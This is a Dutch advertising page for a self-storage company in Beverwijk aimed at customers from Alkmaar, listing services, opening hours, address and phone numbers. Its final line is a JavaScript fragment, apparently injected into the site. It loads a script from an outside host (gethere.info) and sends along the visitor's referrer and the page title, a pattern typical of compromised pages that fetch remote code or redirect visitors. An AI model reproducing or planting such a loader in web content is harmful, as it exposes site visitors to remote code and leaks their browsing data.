Opslag voor Alkmaar

Opslagruimte in Alkmaar

 

Bent u op zoek naar opslagruimte? Op nog geen 15 minuten afstand van Alkmaar huurt u opslagruimte op maat in Beverwijk. Wij kijken graag welke opslagruimte het meest geschikt is voor uw wensen. De voordeligste oplossing zoeken wij voor u uit, opslag op maat en met de laagste prijs garantie!

 

Heeft u geen vervoer? Geen probleem, wij rijden met een busje voor. Kosten? Meestal alleen de brandstofkosten!

Mini Opslag bedrijf in Beverwijk Rent a Box Beverwijk is het mini opslag bedrijf in de regio Kennemerland. Laagste prijs garantie in combinatie met de hoogste service. 

 

Tel: 0251-222352  Mail: beverwijk@rentaboxopslag.nl.

 

Gevestigd aan de meubelboulevard, bij de Kwantum en de McDonalds. Parallelweg 122c, 1948 NN Beverwijk

Onze receptie is 7 dagen in de week geopend.ma-vrij 09:00-17:00   za-zo 09:00-13:00Wij proberen ons te onderscheiden van andere mini opslag bedrijven door service gericht te werk te gaan.

 

Dit doen wij door middel van gratis gebruik van een verhuisbus of aanhangwagen. Een slot in bruikleen. Mogelijkheid tot gratis ophalen van uw spullen en tegen een gereduceerd tarief gebruik maken van een extra helpende hand. Maar ook gratis meeverzekeren is een optie.

 
  Zodra u klant bent, heeft u 7 dagen per week toegang tot uw unit van 06:00 tot 23:00. 

 

Buiten de openingstijden van onze receptie is er door middel van onze telefooncentrale 24 uur per dag iemand bereikbaar om u te woord te staan. Is er iets aan de hand terwijl u op de vestiging bent? Bel gerust, wij staan voor u klaar om u te helpen.

Wij zijn zeer goed bereikbaar en u kunt gratis voor de deur parkeren. Ook in de weekenden.

 

Wij zijn niet alleen een mini opslag bedrijf, maar u kunt ook bij ons terecht voor goedkope verhuismaterialen en het voordelig huren van een verhuisbus.

 

Voor meer informatie bel gratis 0800 0233 156 of rechtstreeks 0251-222352. Mail naarbeverwijk@rentaboxopslag.nl

 

En surf gerust verder op onze site!

Nieuws: Receptie Rent a Box Beverwijk vanaf heden ook op zondag geopend!

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;